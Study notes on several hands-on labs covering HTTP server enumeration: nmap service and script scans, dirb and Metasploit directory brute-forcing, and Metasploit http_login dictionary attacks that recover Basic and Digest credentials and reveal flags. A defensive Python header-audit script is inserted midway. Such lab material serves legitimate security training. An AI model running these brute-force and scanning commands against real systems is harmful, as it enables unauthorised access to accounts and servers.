HTTP (HyperText Transfer Protocol) - a client-server application layer protocol used to load web pages through hypertext links. A client machine sends a request to a server (usually one hosting a website), which then returns a response message to the client. The default HTTP port is 80 and the default HTTPS port is 443.
sudo nmap -p80 -sV -O <TARGET_IP>
Lab 1
🔬 Windows Recon: IIS
Enumeration of an IIS HTTP server without using a browser
nmap 10.4.16.17
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
nmap -sV -O 10.4.16.17
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3306/tcp open mysql MySQL (unauthorized)
3389/tcp open ms-wbt-server Microsoft Terminal Services
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 3 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
http://10.4.16.17 [302 Found] ASP_NET[4.0.30319], Cookies[ASP.NET_SessionId,Server], Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], HttpOnly[ASP.NET_SessionId], IP[10.4.16.17], Microsoft-IIS[10.0], RedirectLocation[/Default.aspx], Title[Object moved], X-Powered-By[ASP.NET], X-XSS-Protection[0]
http://10.4.16.17/Default.aspx [302 Found] ASP_NET[4.0.30319], Cookies[ASP.NET_SessionId,Server], Country[RESERVED][ZZ], HTTPServer[Microsoft-IIS/10.0], HttpOnly[ASP.NET_SessionId], IP[10.4.16.17], Microsoft-IIS[10.0], RedirectLocation[/Default.aspx], Title[Object moved], X-Powered-By[ASP.NET], X-XSS-Protection[0]
📌
IIS Server version is 10.0
ASP.NET version is 4.0.30319
Default page of the target web app is /Default.aspx
httpie
- a CLI, cURL-like HTTP client for humans. Run it with the http command.
HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 130
Content-Type: text/html; charset=utf-8
Date: Thu, 16 Feb 2023 15:11:59 GMT
Location: /Default.aspx
Server: Microsoft-IIS/10.0
Set-Cookie: ASP.NET_SessionId=ngl4kddnvb5g3dx0vol2j11q; path=/; HttpOnly; SameSite=Lax
Set-Cookie: Server=RE9UTkVUR09BVA==; path=/
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-XSS-Protection: 0
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/Default.aspx">here</a>.</h2>
</body></html>
dirb
- a web content scanner. It launches a dictionary-based attack against a web server, looking for existing web objects and analyzing the responses. It comes with a set of preconfigured attack wordlists.
Try to browse to the found directories to find out whether access is granted.
dirb http://10.4.16.17
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Feb 16 20:49:36 2023
URL_BASE: http://10.4.16.17/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
# ^ default wordlist
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.4.16.17/ ----
==> DIRECTORY: http://10.4.16.17/app_themes/
==> DIRECTORY: http://10.4.16.17/aspnet_client/
==> DIRECTORY: http://10.4.16.17/configuration/
==> DIRECTORY: http://10.4.16.17/content/
==> DIRECTORY: http://10.4.16.17/Content/
==> DIRECTORY: http://10.4.16.17/downloads/
==> DIRECTORY: http://10.4.16.17/Downloads/
==> DIRECTORY: http://10.4.16.17/resources/
==> DIRECTORY: http://10.4.16.17/Resources/
---- Entering directory: http://10.4.16.17/app_themes/ ----
==> DIRECTORY: http://10.4.16.17/app_themes/default/
==> DIRECTORY: http://10.4.16.17/app_themes/Default/
---- Entering directory: http://10.4.16.17/aspnet_client/ ----
==> DIRECTORY: http://10.4.16.17/aspnet_client/system_web/
[...]
---- Entering directory: http://10.4.16.17/resources/ ----
==> DIRECTORY: http://10.4.16.17/resources/images/
==> DIRECTORY: http://10.4.16.17/resources/Images/
---- Entering directory: http://10.4.16.17/Resources/ ----
==> DIRECTORY: http://10.4.16.17/Resources/images/
==> DIRECTORY: http://10.4.16.17/Resources/Images/
---- Entering directory: http://10.4.16.17/app_themes/default/ ----
==> DIRECTORY: http://10.4.16.17/app_themes/default/images/
==> DIRECTORY: http://10.4.16.17/app_themes/default/Images/
---- Entering directory: http://10.4.16.17/app_themes/Default/ ----
==> DIRECTORY: http://10.4.16.17/app_themes/Default/images/
==> DIRECTORY: http://10.4.16.17/app_themes/Default/Images/
[...]
browsh
- a fully interactive, real-time, modern text-based browser rendered to TTYs and browsers. It is used when only a command line is available or no graphical browser is installed.
browsh --startup-url http://10.4.16.17/Default.aspx
📌 The target application is WebGoat.net
Lab 2
🔬 Windows Recon: IIS: Nmap Scripts
Enumeration of an IIS HTTP server using nmap scripts
nmap 10.4.21.207
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3389/tcp open ms-wbt-server
nmap --script=http-enum -sV -p80 10.4.21.207
80/tcp open http Microsoft IIS httpd 10.0
| http-enum:
|   /content/: Potentially interesting folder
|   /downloads/: Potentially interesting folder
|_  /webdav/: Potentially interesting folder
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
📌 Potentially interesting folders are content, downloads, webdav.
nmap --script=http-headers -sV -p80 10.4.21.207
80/tcp open http Microsoft IIS httpd 10.0
| http-headers:
|   Cache-Control: private
|   Content-Type: text/html; charset=utf-8
|   Location: /Default.aspx
|   Server: Microsoft-IIS/10.0
|   Set-Cookie: ASP.NET_SessionId=vepmic1tb4hcstgiqdkjj3iy; path=/; HttpOnly; SameSite=Lax
|   X-AspNet-Version: 4.0.30319
|   Set-Cookie: Server=RE9UTkVUR09BVA==; path=/
|   X-XSS-Protection: 0
|   X-Powered-By: ASP.NET
|   Date: Thu, 16 Feb 2023 15:48:53 GMT
|   Connection: close
|   Content-Length: 130
|
|_  (Request type: GET)
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
📌
IIS Server version is 10.0
ASP.NET version is 4.0.30319
Default page of the target web app is /Default.aspx
nmap --script=http-methods --script-args http-methods.url-path=/webdav/ -p80 10.4.21.207
PORT STATE SERVICE
80/tcp open http
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|   Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_  Path tested: /webdav/
📌 Enumerated supported HTTP methods are OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK, PUT.
nmap --script=http-webdav-scan --script-args http-methods.url-path=/webdav/ -p80 10.4.21.207
80/tcp open http
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/10.0
|   Server Date: Thu, 16 Feb 2023 15:58:39 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
|_  Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, LOCK, UNLOCK
Lab 3
🔬 Apache Recon: Dictionary Attack
Enumeration of an Apache HTTP server
ip -br -c a
eth1@if172533 UP 192.199.232.2/24
nmap -sV -sC 192.199.232.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:42:C0:C7:E8:03 (Unknown)
📌 Running web server version is Apache httpd 2.4.18
curl 192.199.232.3 | more
# or
browsh --startup-url http://192.199.232.3
📌 The Apache2 Ubuntu Default page is hosted on the running web server.
Perform a directory brute force using the brute_dirs metasploit module. Use the robots_txt module to detect robots.txt files and analyze their content too.
use auxiliary/scanner/http/brute_dirs
set RHOSTS 192.199.232.3
exploit
[*] Using code '404' as not found.
[+] Found http://192.199.232.3:80/dir/ 401
[+] Found http://192.199.232.3:80/poc/ 401
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
📌 dir, poc directories found.
use auxiliary/scanner/http/robots_txt
set RHOSTS 192.199.232.3
exploit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
# No /robots.txt found
curl
- a command line tool and library for transferring data with URLs
curl http://192.199.232.3/dir
<title>401 Unauthorized</title>
curl -I http://192.199.232.3/dir
HTTP/1.1 401 Unauthorized
Date: Thu, 16 Feb 2023 18:00:56 GMT
Server: Apache/2.4.18 (Ubuntu)
WWW-Authenticate: Basic realm="private"
Content-Type: text/html; charset=iso-8859-1
📌 The dir directory is using Basic auth protection - see the WWW-Authenticate header.
curl http://192.199.232.3/poc
<title>301 Moved Permanently</title>
Use the http_header metasploit module to find out how the poc directory is protected.
use auxiliary/scanner/http/http_header
set RHOSTS 192.199.232.3
set HTTP_METHOD GET
set TARGETURI /poc/
exploit
[+] 192.199.232.3:80 : CONTENT-TYPE: text/html; charset=iso-8859-1
[+] 192.199.232.3:80 : SERVER: Apache/2.4.18 (Ubuntu)
[+] 192.199.232.3:80 : WWW-AUTHENTICATE: Digest realm="Private", nonce="92BOH9X0BQA=373907c8c2a4e147272a81df61079fa305e185af", algorithm=MD5, qop="auth"
[+] 192.199.232.3:80 : detected 3 headers
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
📌 The poc directory is using Digest auth protection.
Use the http_login metasploit module to attempt HTTP user authentication.
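The headers captured in Lab 1 (IIS 302 response), Lab 2 (advertised WebDAV methods) and here (Basic vs Digest in WWW-Authenticate) can be reviewed from the defender's side with a small audit script. This is an added example, not code from the labs; the sample response below is constructed from the Lab 1 capture, and the finding strings and the set of "risky" methods are this example's own choices.

```python
import re
# Headers that hand any unauthenticated client the server/framework version.
DISCLOSURE_HEADERS = {"server", "x-aspnet-version", "x-powered-by"}
# The methods nmap's http-methods script reported as "potentially risky" in Lab 2.
RISKY_METHODS = {"TRACE", "PUT", "DELETE", "COPY", "MOVE", "PROPFIND",
                 "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}
# Constructed sample: the Lab 1 IIS 302 response, trimmed to the headers that matter.
IIS_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "Set-Cookie: ASP.NET_SessionId=ngl4kddnvb5g3dx0vol2j11q; path=/; HttpOnly; SameSite=Lax\r\n"
    "Set-Cookie: Server=RE9UTkVUR09BVA==; path=/\r\n"
    "X-AspNet-Version: 4.0.30319\r\n"
    "X-Powered-By: ASP.NET\r\n\r\n"
    "<html><head><title>Object moved</title></head></html>")

def parse_response(raw):
    """Split a raw HTTP/1.1 response into (status code, [(name, value), ...])."""
    lines = raw.partition("\r\n\r\n")[0].split("\r\n")
    status = int(lines[0].split()[1])
    return status, [(n.strip().lower(), v.strip())
                    for n, _, v in (l.partition(":") for l in lines[1:])]

def auth_params(value):
    """'Digest realm="x", qop="auth"' -> ('Digest', {'realm': 'x', 'qop': 'auth'})."""
    scheme, _, rest = value.partition(" ")
    pairs = re.findall(r'(\w+)=("[^"]*"|[^,\s]*)', rest)
    return scheme, {k: v.strip('"') for k, v in pairs}

def audit(raw):
    """Return the findings a defender would review for one response."""
    status, headers = parse_response(raw)
    findings = []
    for name, value in headers:
        if name in DISCLOSURE_HEADERS:
            findings.append(f"version disclosure: {name}: {value}")
        elif name == "set-cookie":  # flag session cookies missing HttpOnly/Secure
            cookie, *attrs = [p.strip() for p in value.split(";")]
            flags = {a.split("=")[0].lower() for a in attrs}
            for wanted in ("httponly", "secure"):
                if wanted not in flags:
                    findings.append(f"cookie {cookie.split('=')[0]} missing {wanted}")
        elif name == "www-authenticate":  # Basic sends credentials base64-encoded only
            scheme, params = auth_params(value)
            findings.append(f"{status}: {scheme} auth, realm {params.get('realm')!r}")
        elif name in ("allow", "public"):  # method lists as returned to OPTIONS
            risky = sorted(RISKY_METHODS & {m.strip().upper() for m in value.split(",")})
            if risky:
                findings.append("risky methods advertised: " + " ".join(risky))
    return findings
```

Run audit() over any captured response; the Server cookie from Lab 1 is reported twice because it carries neither HttpOnly nor Secure.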
echo -e "alice\nbob\n" > /tmp/users
# to create the "alice" and "bob" users list
msfconsole
use auxiliary/scanner/http/http_login
set RHOSTS 192.199.232.3
set USER_FILE /tmp/users
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set AUTH_URI /dir/
exploit
[*] Attempting to login to http://192.199.232.3:80/dir/
[+] 192.199.232.3:80 - Success: 'bob:qwerty'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
📌 dir directory credentials are bob:qwerty
curl -u bob:qwerty http://192.199.232.3/dir/
Reveal Flag - dir directory flag is: 🚩72af1d9471cfea41ac0ff3600b3702f6
use auxiliary/scanner/http/http_login
set RHOSTS 192.199.232.3
set USER_FILE /tmp/users
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set AUTH_URI /poc/
exploit
[*] Attempting to login to http://192.199.232.3:80/poc/
[+] 192.199.232.3:80 - Success: 'alice:password1'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
📌 poc directory credentials are alice:password1
curl --digest -u alice:password1 http://192.199.232.3/poc/
Reveal Flag - poc directory flag is: 🚩0b6f98199bae51afc2f60578f923f8af
Lab 4
🔬 Apache Recon: Basics
Enumeration of an Apache HTTP server
ip -br -c a
eth1@if172533 UP 192.157.222.2/24
nmap -sV -sC 192.157.222.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-robots.txt: 3 disallowed entries
|_/cgi-bin/ Disallow: /junk/ /no-badbot-dir/
|_http-title: Apache2 Ubuntu Default Page: It works
📌 Running web server version is Apache httpd 2.4.18
curl http://192.157.222.3
wget http://192.157.222.3
cat index.html
lynx
- a text-based web browser.
lynx http://192.157.222.3
dirb http://192.157.222.3 /usr/share/metasploit-framework/data/wordlists/directory.txt
---- Scanning URL: http://192.157.222.3/ ----
+ http://192.157.222.3//data (CODE:301|SIZE:313)
+ http://192.157.222.3//dir (CODE:301|SIZE:312)
setg RHOSTS 192.157.222.3
setg RHOST 192.157.222.3
use auxiliary/scanner/http/http_version
run
[+] 192.157.222.3:80 Apache/2.4.18 (Ubuntu)
use auxiliary/scanner/http/brute_dirs
run
[+] Found http://192.157.222.3:80/dir/ 200
[+] Found http://192.157.222.3:80/src/ 200
curl http://192.157.222.3/robots.txt
Reveal Flag - poc directory flag is: 🚩